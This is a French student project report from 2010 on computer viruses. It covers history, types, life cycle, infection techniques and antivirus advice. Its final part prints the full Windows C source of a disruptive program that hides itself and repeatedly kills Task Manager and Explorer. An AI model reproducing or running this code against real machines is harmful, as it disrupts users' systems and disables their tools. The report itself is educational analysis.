virus informatiques
TRANSCRIPT
E n c a d r é p a r :
M. Abderrahim SABOUR
Virus InformatiquesProjet de Fin de Module
25/04/2010
M o d u l e : S y s t è m e d ’ E x p l o i t a t i o n
R é a l i s é p a r :
Abdelouahed ERROUAGUI
Ahmed JNAH
Hamid IMIHI
Yassine ELQANDIL
1 Virus Informatiques
SommaireI. Introduction :......................................................................................................................3
II. Définitions :.........................................................................................................................4
III. Historique :.........................................................................................................................4
IV. Type des virus :...................................................................................................................5
Vers :...................................................................................................................................5
Qu’est-ce que c’est ? 5
Le fonctionnement d'un ver dans les années 80 : 6
Les vers actuels : 6
Chevaux de Troie :..............................................................................................................6
Qu’est-ce que c’est ? 6
Les symptômes d'une infection : 7
Liste des ports utilisés habituellement par les troyens : 7
Canular :..............................................................................................................................8
Qu’est-ce qu’un hoax? 8
Virus du Secteur de Démarrage :.......................................................................................8
Qu’est-ce qu’un virus secteur de démarrage ? 8
Virus Macro :......................................................................................................................8
Qu’est-ce qu’un virus de macro ? 8
Mails :.................................................................................................................................9
Qu’est-ce que c’est ? 9
Les virus qui se propagent automatiquement par mail : 9
Qu’est-ce qu’un spam ? 10
Les pièces jointes : 10
Les spywares :...................................................................................................................10
Qu’est-ce que c’est ? 10
Comment cela fonctionne-t-il ? 11
V. Cycle De Vie Des Virus Informatique :...............................................................................11
2 Virus Informatiques
Création:...........................................................................................................................11
Gestation:.........................................................................................................................11
Reproduction (infection):.................................................................................................12
Activation:........................................................................................................................12
Découverte:......................................................................................................................12
Assimilation:.....................................................................................................................12
Elimination:......................................................................................................................12
VI. Modes d’infection :(fonctionnement)...............................................................................13
Recouvrement :................................................................................................................13
Ajout :...............................................................................................................................14
Cavité :..............................................................................................................................14
Point d'entrée obscure :...................................................................................................15
VII. Les Mesures pour protéger mon ordinateur contre les virus...........................................16
Antivirus/Pare-feu............................................................................................................16
Qu'est-ce qu'un antivirus ? 16
Qu'est-ce qu'un pare-feu (firewall) ? 16
Solutions...........................................................................................................................16
VIII. Exemple de virus...............................................................................................................18
Virus en C :........................................................................................................................18
IX. Conclusion :.......................................................................................................................22
3 Virus Informatiques
I. Introduction :
Dans le cadre des mini-projets du module système d’exploitation encadré par M.
Abderrahim SABOUR, nous avons eu l’occasion d’étudier le sujet : Virus Informatiques.
Nous avons décidé de prendre ce sujet comme mini-projet pour arriver à comprendre
comment les virus fonctionnent réellement, et pour décortiquer un virus programmé en C.
Dans ce rapport nous avons séparé notre étude en deux parties :
1. Partie Théorique :
1.1. Définition
1.2. Historique
1.3. Types des virus Informatique
1.4. Cycle de vie
1.5. Mode de fonctionnement
2. Partie Pratique :
2.1. Etude de cas d’un virus en C
4 Virus Informatiques
II. Définitions :
Un Virus est un programme susceptible d'entraîner des perturbations dans le
fonctionnement d'un ordinateur en dénaturant ses programmes exécutables ou ses fichiers
système. Il se transmet généralement par l'intermédiaire de disquettes ou encore par
téléchargement. La plupart des virus informatiques ajoutent quelques lignes de commandes
dans le fichier cible lorsqu'ils sont chargés en mémoire. Ces commandes ont généralement.
Actuellement, il existe de nombreux types de virus informatiques, toujours plus sournois et
moins visibles. Un virus capable de se propager à travers des réseaux informatiques est
parfois appelé ver, en particulier lorsqu'il se compose de plusieurs segments dispersés à
travers le réseau. Un virus peut rester dans la mémoire de l'ordinateur, constituant dans ce
cas un programme terminate-and-stay-resident (TSR) : on dit alors qu'il s'agit d'un virus
résident mémoire. Il peut en outre être encrypté, rendant ainsi sa détection et sa résorption
plus délicates. Enfin, il peut être polymorphe, évitant d'être décelé grâce à un changement
interne de sa structure.
III. Historique :
1949 : John Von Neumann présente les fondements théoriques des logiciels
autocopiés.
1960 : Un groupe de jeunes ingénieurs des laboratoires Bell met au point un jeu
informatique du nom de Core war : on installe dans la mémoire vive d'un ordinateur
deux programmes chargés de se retrouver. Le gagnant doit détruire l'autre en
s'autocopiant dans ses fichiers.
1984 : Le magazine Scientific American présente un guide pour fabriquer ses propres
virus.
1986 : Les frères Alvi, deux Pakistanais, fournissent à des touristes des copies de
logiciels pirates infectés du virus Brain. Ce serait le premier virus clairement identifié
et connu. Il a causé de sérieux dégâts sur les campus américains.
5 Virus Informatiques
1988 : Peace/Mac affiche son message de paix universelle sur les écrans de
possesseurs de Macintosh II.
1988 : Robent Morris est arrêté pour fraude informatique. Cet étudiant vient de
causer 15 millions de dollars de dommage sur Internet à cause de son virus.
1989 : Datacrime : trois virus font trembler les Pays-Bas et la France. La police
néerlandaise propose alors un ensemble de programmes informatiques à bas prix
pour lutter contre ces virus. C'est à cette époque que la France prend réellement
conscience de l'existence des virus.
1991 : Diffusé par une disquette vendue dans la revue Soft et Micro, le virus
Frodo/4096 arrive en France. Le Clusif (Club de la sécurité des systèmes
d'information français) propose sur son serveur une procédure de détection et de
décontamination pour lutter contre Frodo. Le serveur enregistre 8 000 connexions.
1992 : Le virus Michelangelo plonge la planète dans l'effroi. Ses effets restent
pourtant limités : 200 000 machines, au lieu des 5 à 15 millions annoncés.
1995 : Les premiers virus macros destructeurs apparurent en été.
1998 : D'après les chiffres publiés par Dr Salomon's, éditeur d'antivirus, on recensait
17 745 virus différents en 1998, contre 18 en 1989.
1999 : Le virus Mélissa se propage par internet. Caché dans un document Word,
Mélissa s'auto envoyait aux 50 premiers contacts contenus dans le carnet d'adresses
d'Outlook. Résultat : plus de 300 000 ordinateurs infectés. Internet devenait le
premier vecteur de contamination.
2000 : Le virus I Love You sème de nouveau la panique sur Internet.
2003 : Le virus MyDoom a beaucoup fait parler de lui, et la tête de l'auteur de ce
dernier reste mise à prix.
IV. Type des virus :
Vers : Qu’est-ce que c’est ?
Un ver informatique (en anglais Worm) est un programme qui peut s'auto-reproduire et se déplacer à travers un réseau en utilisant les mécanismes réseau, sans avoir réellement besoin
6 Virus Informatiques
d'un support physique ou logique (disque dur, programme hôte, fichier, etc.) pour se propager; un ver est donc un virus réseau.
Le fonctionnement d'un ver dans les années 80 :
La plus célèbre anecdote à propos des vers date de 1988. Un étudiant (Robert T. Morris, de Cornell University) avait fabriqué un programme capable de se propager sur un réseau, il le lança et, 8 heures après l'avoir lâché, celui-ci avait déjà infecté plusieurs milliers d'ordinateurs. C'est ainsi que de nombreux ordinateurs sont tombés en pannes en quelques heures car le « ver » (car c'est bien d'un ver dont il s'agissait) se reproduisait trop vite pour qu'il puisse être effacé sur le réseau. De plus, tous ces vers ont créé une saturation au niveau de la bande passante, ce qui a obligé la NSA à arrêter les connexions pendant une journée.
Voici la manière dont le ver de Morris se propageait sur le réseau :
Le ver s'introduisait sur une machine de type UNIX il dressait une liste des machines connectées à celle-ci
il forçait les mots de passe à partir d'une liste de mots
il se faisait passer pour un utilisateur auprès des autres machines
il créait un petit programme sur la machine pour pouvoir se reproduire
il se dissimulait sur la machine infectée
et ainsi de suite
Les vers actuels :
Les vers actuels se propagent principalement grâce à la messagerie (et notamment par le
client de messagerie Outlook) grâce à des fichiers attachés contenant des instructions
permettant de récupérer l'ensemble des adresses de courrier contenues dans le carnet
d'adresse et en envoyant des copies d'eux-mêmes à tous ces destinataires.
Ces vers sont la plupart du temps des scripts (généralement VB Script) ou des fichiers
exécutables envoyés en pièce jointe et se déclenchant lorsque l'utilisateur destinataire
clique sur le fichier attaché.
Chevaux de Troie : Qu’est-ce que c’est ?
Un cheval de Troie (informatique) est donc un
programme caché dans un autre qui exécute des
7 Virus Informatiques
commandes sournoises, et qui généralement donne un accès à l'ordinateur sur lequel il est
exécuté en ouvrant une porte dérobée
Les chevaux de Troie par porte dérobée sont des programmes qui autorisent d’autres
personnes que vous à prendre le contrôle de votre ordinateur au travers d’Internet.ils sont
parfois utilisés comme moyen d’installer un virus chez un utilisateur.
Les symptômes d'une infection :
Le principe des chevaux de Troie étant généralement (et de plus en plus) d'ouvrir un port de
votre machine pour permettre à un pirate d'en prendre le contrôle (par exemple voler des
données personnelles stockées sur le disque), le but du pirate est dans un premier temps
d'infecter votre machine en vous faisant ouvrir un fichier infecté contenant le troyen (trojan)
et dans un second temps d'accéder à votre machine par le port qu'il a ouvert.
Toutefois pour pouvoir s'infiltrer sur votre machine, le pirate doit généralement en connaître
l'adresse IP. Ainsi :
soit vous avez une adresse IP fixe (cas d'une entreprise ou bien parfois de particuliers
connecté par câble, etc.) auquel cas l'adresse IP peut être facilement récupérée
soit votre adresse IP est dynamique (affectée à chaque connexion), c'est le cas pour les
connexions par modem ; auquel cas le pirate doit scanner des adresses IP au hasard afin de
déceler les adresses IP correspondant à des machines infectées.
Liste des ports utilisés habituellement par les troyens :
port Troyen
21 Back construction, Blade runner, Doly, Fore, FTP trojan, Invisible FTP, Larva,
WebEx, WinCrash
23 TTS (Tiny Telnet Server)
25 Ajan, Antigen, Email Password Sender, Happy99, Kuang 2, ProMail trojan,
Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat
59 DMSetup
8 Virus Informatiques
Canular : Qu’est-ce qu’un hoax?
On appelle hoax (en français canular) un courrier électronique propageant une fausse information et poussant le destinataire à diffuser la fausse nouvelle à tous ses proches ou collègues.Ainsi, de plus en plus de personnes font suivre des informations reçues par courriel sans vérifier la véracité des propos qui y sont contenus. Le but des hoax est simple :
provoquer la satisfaction de son concepteur d'avoir berné un grand nombre de personnes
Les conséquences de ces canulars sont multiples : L'engorgement des réseaux en provoquant une masse de données superflues
circulant dans les infrastructures réseaux ; Une désinformation, c'est-à-dire faire admettre à de nombreuses personnes de faux
concepts ou véhiculer de fausses rumeurs (on parle de légendes urbaines) ; L'encombrement des boîtes aux lettres électroniques déjà chargées ; La perte de temps, tant pour ceux qui lisent l'information, que pour ceux qui la
relayent ; La dégradation de l'image d'une personne ou bien d'une entreprise ; L'incrédulité : à force de recevoir de fausses alertes les usagers du réseau risquent de
ne plus croire aux vraies.
Virus du Secteur de Démarrage :
Qu’est-ce qu’un virus secteur de démarrage ?
Les virus de secteur d'amorçage résident dans le premier secteur d'un support physique (disque dur ou disquette) ou du système d'exploitation (DOS ou Windows en général). Le contenu original du secteur est déplacé vers une autre zone du disque et le virus s'octroie cet emplacement.Ce positionnement leurs permets (ces virus sont amorcés dès le démarrage) d'être activé avant tout le reste, leur conférant ainsi, un contrôle important de l'ordinateur. Ces virus se chargent généralement en mémoire vive et y demeurent
jusqu'à la mise hors tension de l'ordinateur.Ils se distinguent principalement par leur mode de contagion, leurs conséquences ne varient pas, destruction de fichiers, de données voire reformatage. Heureusement, la plupart des virus de boot ne fonctionnent plus sous les nouveaux systèmes d'exploitation tels que Windows NT et tendent à disparaître progressivement.
Virus Macro : Qu’est-ce qu’un virus de macro ?
9 Virus Informatiques
Les virus Macros sont la plus grande menace à ce jour, ils se
propagent lorsqu’un document Microsoft Word, Excel ou
PowerPoint contaminé est exécuté. Un virus Macro est une
série de commandes permettant d’effectuer un certain
nombre de tâches automatiquement au sein des applications
ci-dessus. Le but non nuisible du langage de macro dans ces
applications est à l’origine de pouvoir créer des raccourcis
pour effectuer des tâches courantes, par exemple en une touche imprimer un document, le
sauvegarder et fermer l’application.
Les Virus Macros non supprimés se répandent très rapidement. L’ouverture d’un document
infecté va contaminer le document par défaut de l’application, et ensuite tous les
documents qui seront ouverts au sein de l’application. Les documents Word, Excel et
PowerPoint étant les documents les plus souvent partagés, envoyés par Internet, ceci
explique la diffusion rapide de ces virus. De plus le langage de programmation des Macros
est beaucoup plus facile à apprendre et moins compliqué qu’un langage de programmation
classique.
Mails : Qu’est-ce que c’est ?
Les virus des mails sont capables d’infecter les
utilisateurs à la lecture d’un mail. Ils ont
l’apparence de n’importe quel autre message,
mais contiennent pourtant un script caché qui
s’exécute dès que vous ouvrez le mail, ou même le
pré visualisez dans le panneau d’aperçu (si tant est que vous utilisiez Outlook avec la version
correcte d’Internet Explorer). Ce script peut changer les paramètres de votre système et
envoyer le virus à d’autres utilisateurs par mail.
Les virus qui se propagent automatiquement par mail :
Ce sont les virus typiques qui s’activent par un simple clic de l’utilisateur sur le document
joint. Celui-ci exécute un script qui utilise les programmes de messagerie pour faire suivre les
10 Virus Informatiques
documents infectés à d’autres utilisateurs de mails. Melissa, par exemple, envoie un
message aux cinquante premiers contacts de tous les carnets d’adresses auxquels Microsoft
Outlook peut accéder. D’autres virus s’envoient d’eux-mêmes à tous les contacts du carnet
d’adresse.
Qu’est-ce qu’un spam ?
Un spam est un mail non sollicité, qui fait souvent la promotion de plans d’enrichissement
rapide, d’emplois à domicile, de prêts bancaires ou de sites à caractère pornographique. Les
spams arrivent souvent avec de fausses références sur l’expéditeur, d’où la difficulté à réagir
contre leur auteur. Ces mails doivent simplement être détruits.
Les pièces jointes :
Le risque vient des logiciels de messageries qui sont installés sur votre ordinateur, surtout la
messagerie Outlook Express, client de messagerie fourni avec Windows XP, à cause de son
faible niveau de sécurité face aux agressions venant d'Internet.
Pour l'internaute, l'utilisation de la messagerie reste l'échange de courrier au format texte.
De façon plus avancée, vous pouvez :
- soit transmettre un fichier informatique : document Word, Excel, une image (type photo)
ou une archive compressée.
- soit recevoir un document d'un correspondant. Ces pièces-jointes correspondent aux
documents que l'on reçoit. .
Donc le danger vient de ces documents transmis, surtout s'il s'agit d'un fichier exécutable
avec une extension :.com, .bat, .exe même si la pièce-jointe est envoyée par une personne
connue, le document peut contenir un parasite : virus, vers... qui peut contaminer votre
ordinateur si ce fichier est exécuté. Si vous ouvrez par inadvertance un document infecté,
vous installez le parasite sur votre machine, le processus est enclenché, le virus va utiliser
votre carnet d'adresse pour se propager et contaminer les contacts de votre carnet.
Les spywares : Qu’est-ce que c’est ?
11 Virus Informatiques
Un spyware est un logiciel espion. C'est un programme ou un sous-programme conçu dans le
but de collecter des données personnelles sur ses utilisateurs et de les envoyer à son
concepteur ou à un tiers via Internet ou tout autre réseau informatique, sans avoir obtenu
au préalable une autorisation de l'utilisateur. Les spywares ont pour objectif primaire,
d’espionner le comportement de l’internaute et de transmettre ensuite, à son insu, les
informations collectées aux créateurs et éditeurs de logiciels afin d’alimenter une
gigantesque base de données.
Comment cela fonctionne-t-il ?
Un spyware « s’attrape » en général en naviguant sur Internet, ainsi qu'en téléchargeant
des logiciels gratuits (freeware) ou de publicité (adware). Il est tout particulièrement
fréquent dans les programmes de messagerie instantanée (ICQ), les lecteurs audio
(RealPlayer) et les systèmes «peer-to-peer » (Kazaa, Limewire).
Le spyware lui-même est un programme autonome ou associé à un logiciel prévu pour tout
autre chose. Il utilise alors des techniques comme l'ingénierie sociale ou celles des chevaux
de Troie.
V. Cycle De Vie Des Virus Informatique :
Les virus informatiques, tout comme les virus biologiques, possèdent un cycle de vie :
Création:
C’est la période que va passer un programmeur à développer un virus aussi féroce que
possible. La programmation se fait en code assembleur.
Gestation:
Il s'agit du procédé par lequel le virus est copié en un endroit stratégique afin que sa
diffusion soit la plus rapide possible. En général, la méthode consiste à infecter un
12 Virus Informatiques
programme très populaire puis à le distribuer par l'intermédiaire d'un serveur BBS, du
courrier électronique, de l'Internet ou au sein d'une entreprise, d'une école, etc.
Reproduction (infection):
Les virus, de par leur nature, cherchent à se reproduire. Un virus correctement conçu se
reproduira un nombre de fois important avant de s'activer. C'est là le meilleur moyen de
s'assurer de la pérennité d'un virus.
Activation:
Les virus possédant une routine de destruction ne s'activent que lorsque certaines
conditions sont réunies. Certains s'activent à certaines dates, d'autres possèdent un système
de compte à rebours interne. Même les virus ne possédant pas de telles routines et ne
nécessitant pas de procédure d'activation spécifique peuvent causer des dommages à votre
système en s'appropriant petit à petit l'ensemble de vos ressources.
Découverte:
Cette phase de l'existence d'un virus n'est pas forcément consécutive à son activation, mais
c'est généralement à ce moment-là qu'elle a lieu. La découverte d'un virus est le moment où
quelqu'un se rend compte de sa présence et parvient à l'isoler. Une fois cette opération
réalisée, le nouveau virus est généralement transmis au NCSA (National Computer Security
Association) à Washington DC où il est documenté puis distribué aux développeurs de
logiciels antivirus. La découverte a lieu la plupart du temps au moins un an avant qu'un virus
ne devienne une véritable menace pour la communauté informatique.
Assimilation:
Une fois la découverte faite, les développeurs de logiciels modifient leurs programmes pour
qu'ils puissent détecter la présence du virus. Cette phase dure entre un jour et six mois,
selon la compétence du développeur d'anti- virus.
Elimination:
13 Virus Informatiques
Si un nombre suffisant de développeurs d'antivirus sont capables de faire face au virus et si
suffisamment de personnes se procurent l'antivirus adéquat, il est possible d'annihiler un
virus. Dans les faits, aucun virus n'a réellement disparu, mais un grand nombre d'entre eux
ont cessé de constituer une menace réelle.
VI. Modes d’infection :(fonctionnement)Modes d'infection Les différentes techniques décrites ci-dessous s’appliquent principalement aux
virus programmes. Certaines d’entre elles s’appliquent néanmoins aux virus interprétés. Il existe en
effet des virus « par recouvrement » et « par ajout » parmi les macrovirus et les virus de script.
Recouvrement :
Un virus par recouvrement se contente d’écraser partiellement ou en totalité le programme qu’il
infecte. En conséquence, il le détruit au moins partiellement et rend son éradication impossible. Dans
certains cas, la taille du programme infecté n’est pas modifiée ; dans les cas contraires, celle-ci
s’ajuste à la taille du code viral et devient identique pour tout fichier infecté. La destruction, même
partielle, du code originel fait que celui-ci ne peut plus fonctionner correctement. Ces virus ne sont
généralement pas résident en mémoire. Ne réalisant plus la fonction souhaitée, l’utilisateur les
détecte rapidement. Les virus agissant par recouvrement ne réussissent jamais à se disséminer
largement.
Exemple : BadGuy, W32/HLL.ow.Jetto, LINUX/Radix.ow, VBS/Entice.ow.
Le virus écrase une partie du code du programme hôte
14 Virus Informatiques
Ajout :
Un virus par ajout modifie un programme sans le détruire. Ayant altéré le point d'entrée, le virus
s’exécute chaque fois que le programme est lancé, puis lui « rend la main ». Celui-ci fonctionne alors
de façon normale. La force d’un virus par ajout est que le programme infecté semble fonctionner
correctement ce qui peut retarder la détection du virus. La faiblesse d’un virus par ajout est que la
taille du programme est augmentée de la taille du virus, ce qui rend un repérage fondé sur la
variation de la taille des programmes possible.
Exemples: Cascade, Jérusalem, W95/Anxiety, W32/Chiton, VBS/Daydream.
Cavité :
Connaissant la structure spécifique du type des programmes à contaminer, le virus modifie le point
d'entrée du programme et insère tout ou partie de son code dans différentes zones non utilisées. Le
fichier COMMAND.COM fut longtemps la cible privilégiée de ce genre de virus ; dans ce cas, le code
viral pouvait se situer entre le bloc de code, le bloc des données, le bloc de pile « stack ». Cette
technique est maintenant régulièrement rencontrée dans les environnements Windows.
Le virus greffe son code sur le programme hôte
15 Virus Informatiques
Exemple : W95/Caw.
Point d'entrée obscure : Avant infection, l'analyse du programme cible permet un positionnement du point d'entrée du code
viral en un lieu variable au sein du fichier. Le point d’entrée du programme et les instructions qui s’y
situent sont inchangés. Lorsque cette technique est associée à une infection par cavité et à un
codage polymorphique, la détection devient très problématique. Cette technique est maintenant
régulièrement rencontrée dans les environnements Windows. Elle est très pénalisante pour les
antivirus qui doivent parfois élargir fortement leur zone de recherche. Exemple : W95/Orez.
VII.
Les Mesures pour protéger mon ordinateur contre les virusInternet est un outil de travail merveilleux, mais aussi un endroit où les virus voyagent en grand
nombre et en tout temps. Heureusement, il existe des moyens pour vous protéger contre ces virus,
dont la protection avec les logiciels antivirus.
Le virus morcelle son code en modules insérés dans les espaces inoccupés du
programme hôte
Le virus place son point d'entrée dans un endroit variable du programme hôte
16 Virus Informatiques
Si vous êtes aux prises de virus, soit vous n'avez pas installé un logiciel antivirus ou encore, votre
logiciel n'a pas réussi à tout arrêter. La première chose à faire est de lancer un scan de tous vos
disques installés dans votre ordinateur à l'aide de votre logiciel antivirus. Ensuite, lancez également
un scan de vos dossiers et fichiers à l'aide d'un logiciel anti-espion. De cette manière, vous éliminerez
les virus, ainsi que les logiciels espions qui se sont infiltrés dans votre ordinateur à votre insu.
Il existe plusieurs bons logiciels anti-virus gratuits sur le marché. Pour éliminer définitivement les
virus informatiques de votre PC, je vous recommande le logiciel Kaspersky 2010, la version familiale.
Une fois installé, le logiciel vous demandera l'autorisation pour lancer un scan complet de tout votre
ordinateur.
Antivirus/Pare-feu Qu'est-ce qu'un antivirus ?
Un antivirus est un programme capable de détecter la présence de virus sur un ordinateur et, dans la
mesure du possible, de désinfecter ce dernier. On parle ainsi d'éradication de virus pour désigner la
procédure de nettoyage de l'ordinateur. Chaque ordinateur, pour assurer sa sécurité sur internet,
doit disposer d'un seul antivirus et d'un seul pare-feu (firewall) (plusieurs antivirus ou plusieurs pare-
feu créent des conflits...).
Qu'est-ce qu'un pare-feu (firewall) ?
Un pare-feu (appelé aussi coupe-feu, garde-barrière ou firewall en anglais), est un système
permettant de protéger un ordinateur ou un réseau d'ordinateurs des intrusions provenant d'un
réseau tiers (notamment Internet). Le pare-feu est un système permettant de filtrer les paquets de
données échangés avec le réseau.
Solutions
Voici quelques moyens de protéger votre ordinateur contre les virus:
Solution 1: Les logiciels antivirus
Votre première ligne de défense consiste à installer un logiciel antivirus. Pour être plus sûr, installez
également un logiciel pare-feu, qui est maintenant intégré dans certains antivirus. Ce logiciel peut
balayer tous vos disques de virus et les neutraliser. Voici quelques éléments à considérer lors de
l'évaluation d'un logiciel antivirus.
- La compatibilité avec votre système d'exploitation. Assurez-vous que le logiciel fonctionne avec
votre système, en particulier si vous utilisez un vieux système d'exploitation comme Windows 98.
- Protection automatique de fond. Cela signifie que votre logiciel antivirus est constamment en action
17 Virus Informatiques
pour détecter les infections et les neutraliser comme elles apparaissent. Cela donne une tranquillité
d'esprit.
- La fréquence des mises à jour. Comme de nouveaux virus apparaissent chaque jour, vous aurez
besoin de mises à jour régulières. C'est encore mieux si elles se produisent automatiquement lorsque
vous vous connectez à Internet. Si la mise à jour automatique n'est pas incluse, vous aurez à vérifier
vous-même sur Internet les mises à jour qui doivent être installées dans votre logiciel de sécurité.
- La certification ICSA. La sécurité informatique dispose de normes pour les taux de détection des
logiciels antivirus. Assurez-vous que votre logiciel a la certification ICSA.
- Le support technique. C'est une bonne idée de choisir un forfait qui offre une assistance technique
gratuite, en ligne ou par le biais d'un numéro sans frais.
Solution 2: Méfiez-vous des extensions de nom de fichier
L'extension d'un nom de fichier est les trois éléments qui viennent après le point. Windows, par
défaut, a caché les extensions de nom de fichier, mais ce n'est pas une très bonne idée. Pour voir les
extensions d’un nom de fichier, cliquez sur le bouton Démarrer, ensuite sur Panneau de
configuration. Choisissez alors Options des dossiers et type de fichier. Désactivez la case à cocher
Masquer les extensions des fichiers dont le type est connu. Cliquez sur Appliquer.
Solution 3: Méfiez-vous des inconnus .exe
Un virus est un logiciel qui doit être exécuté afin de faire son sale boulot. Les virus ont généralement
comme extension, exe. Malheureusement, c'est le même dans Program Files. Alors, ne paniquez pas
si vous trouvez des fichiers nommés Word.exe ou Excel.exe sur votre système; il s’agit seulement de
vos logiciels Microsoft. Il suffit de ne jamais ouvrir un fichier avec une extension .exe si vous ne savez
pas la raison d'être de ce fichier.
Solution 4: Protéger les macros de MS Word, Excel et Powerpoint
Les macros virus sont un autre type de virus. Les macros sont des ensembles de commandes que les
utilisateurs peuvent enregistrer en tant que raccourcis pour exécuter des fonctions parfois longues
en quelques frappes de touche seulement. Un virus de macro peut verrouiller le clavier et même
faire la suppression de fichiers. Word, Excel, PowerPoint viennent tous avec une fonction pour vous
protéger contre les virus macros. Pour vous assurer que le vôtre est activé, cliquez sur le menu Outils,
18 Virus Informatiques
Macro et Sécurité. Sur l'onglet Niveau de sécurité, assurez-vous que moyen ou élevé est sélectionné.
Solution 5: Utiliser des mots de passe
Si vous partagez votre ordinateur, c'est une bonne idée d'attribuer à chacun un mot de passe. Les
mots de passe doivent être une combinaison d'au moins huit caractères, des lettres et des chiffres, et
de préférence n’ayant aucun sens.
Solution 6: Mise à jour du logiciel d'application
des Microsoft effectue constamment correctifs pour les failles de sécurité dans son système
d'exploitation et les logiciels d'application. Il est donc important d’effectuer les mises à jour de
Windows fréquemment. Pour obtenir les correctifs de sécurité les plus récents.
VIII. Exemple de virus
Virus en C :
/**********************************/
//DoubleStopProcess.c
//Compiler Dev-C++ 4.9.9.2
/**********************************/
#include <windows.h>
#include <windowsx.h>
#include <tlhelp32.h>//contient les variable de type PROCESSENTRY32
#include <process.h>
#include<stdlib.h>
#define Progy "taskmgr.exe"
#define Master "explorer.exe"
int func_termi(void);
int ID,XY,T3;
19 Virus Informatiques
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int CmdShow)
{
char message[] = "This programme affects yout taskmanager :) stop me if u cann TAB+SHIFT+RETURN";
char title[] = "INFORMATION";
HWND nShow;
nShow = FindWindow("ConsoleWindowClass","ConsoleWindowClass");/**3kelt ta9riban**/
ShowWindow(nShow,SW_HIDE);/**set the specified window's show state.
SW_HIDE :Hides the window
and activates another window.**/
MessageBox(0,message,title,MB_OK| MB_ICONINFORMATION);/**si title est null
la valeur par défaut est ERROR**/
// _sleep(100);
func_termi();
}
int func_termi(void)
{
long code;
HANDLE Snap,Process;/**Le handle est un identifiant qui permet de désigner
l'objet de manière unique.
C'est juste une autre manière de référencer l'objet.
On ne parlera plus d'adresses pour les références
d'objets managés.**/
PROCESSENTRY32 proc32;/**contient des info sur un processus apres avoir
pris une snapshot des processus qui reside dans
20 Virus Informatiques
le systeme**/
// BOOL ServiceName;
while(1)
{
_sleep(100);
Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);/**Tlhelp32.h**/
/**Takes a snapshot of the specified processes,
as well as the heaps, modules, and threads
used by these processes.**/
/** Includes all processes
in the system in the snapshot.
To enumerate the processes**/
if(Snap==INVALID_HANDLE_VALUE)
{
MessageBox(0,"Sorry,no way!!!","Error",MB_OK | MB_ICONERROR);
exit(0);
}
proc32.dwSize=sizeof(PROCESSENTRY32);
if((GetAsyncKeyState(VK_TAB)==-32767)&&(GetAsyncKeyState(VK_SHIFT)==-32767
)&&(GetAsyncKeyState(VK_UP)==-32767))
{
MessageBox(0,"U knew the key NOOO I'm GOOONE ;","BYE BYE",MB_OK | MB_ICONEXCLAMATION);
return EXIT_SUCCESS;
}
while((Process32Next(Snap,&proc32))==TRUE)
{
if(strcmp(proc32.szExeFile,Progy)==0){/**test d'egalité entre le proc courant et la chaine progy **/
ID=proc32.th32ProcessID;
Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);/**Required to retrieve
21 Virus Informatiques
certain information about
a process, such as its token,
exit code, and priority class*/
XY=GetExitCodeProcess(Process,&code);/**Retrieves the termination
status of the specified process.**/
Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);/**Opens an existing
local process object.**/
T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done!Taskmgr.exe is stopped!!!","Info",MB_OK);}
}
else if(strcmp(proc32.szExeFile,Master)==0){/**la meme chose pr l'autre proc**/
ID=proc32.th32ProcessID;
Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);
XY=GetExitCodeProcess(Process,&code);
Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);
T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done! Calc.exe is stopped!!!","Info",MB_OK);}
}
}
}
}
22 Virus Informatiques
IX. Conclusion :Le projet nous a appris comment bien lire un code, l’analyser, le modifier et essayer de se lancer dans ce domaine vague pour atteindre nos objectifs comme futur informaticiens.
Finalement, nous pouvons dire que ce mini-projet nous a été d’une grande utilité, vu que c’était un
défi qui mérite être attaquer.